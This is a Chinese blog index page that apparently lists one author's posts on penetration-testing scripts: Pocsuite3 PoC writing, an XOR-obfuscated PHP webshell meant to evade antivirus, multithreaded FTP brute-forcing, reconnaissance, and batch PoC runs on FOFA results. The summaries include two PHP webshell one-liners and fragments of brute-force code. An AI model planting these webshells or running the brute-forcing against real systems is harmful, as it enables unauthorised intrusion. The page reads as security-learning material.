2021年8月13日
pocsuite3检测工具 编写poc
摘要: github地址:https://github.com/knownsec/Pocsuite3 首先确定pocsuit的命令执行方式 verify模式为漏洞检测模式 attack模式为向目标发起有效的攻击 首先找到一个poc 进行分析源码 复制其源码,再原有的基础框架进行修改,首先修改检测模块 这里举 阅读全文
posted @ 2021-08-13 21:38 bingtanghulu 阅读(863) 评论(1) 推荐(0) 编辑
php异或免杀
摘要: import requests,base64,time,sys,threading,queue #异或免杀 #<?php $a=("!"^"@").'ssert';$a($_POST['hacker']);?> #<?php @eval($_POST['hacker']);?> #!和@ 先各种转为 阅读全文
posted @ 2021-08-13 18:45 bingtanghulu 阅读(202) 评论(0) 推荐(0) 编辑
python 多线程ftp爆破
摘要: import sys,ftplib import threading,queue def ftp_brute(ip,port): ftp = ftplib.FTP() ftp.connect(ip,int(port)) while not q.empty():#判断q不为空 dict=q.get() 阅读全文
posted @ 2021-08-13 16:45 bingtanghulu 阅读(165) 评论(0) 推荐(0) 编辑
python ip查询 whois查询 # CDN查询# 子域名查询# 端口扫描
摘要: import socket, os, time, sys, whois # ip查询 def ip_check(url): ip = socket.gethostbyname(url) print(ip) # whois查询 def whois_check(url): data = whois.wh 阅读全文
posted @ 2021-08-13 13:43 bingtanghulu 阅读(322) 评论(0) 推荐(0) 编辑
python src批量爬取
摘要: import requests, time from lxml import etree def src_tiqu(yeshu): for i in range(1,int(yeshu)+1): try: url = 'https://src.sjtu.edu.cn/list/?i=' + str( 阅读全文
posted @ 2021-08-13 12:44 bingtanghulu 阅读(295) 评论(0) 推荐(0) 编辑
python脚本 批量化poc编写
摘要: import requests,base64,time,sys from lxml import etree # fofa网址获取 # 例如:https://fofa.so/result?qbase64 &page=3 def fofa_search(search_data,page): #sear 阅读全文
posted @ 2021-08-13 10:54 bingtanghulu 阅读(293) 评论(0) 推荐(0) 编辑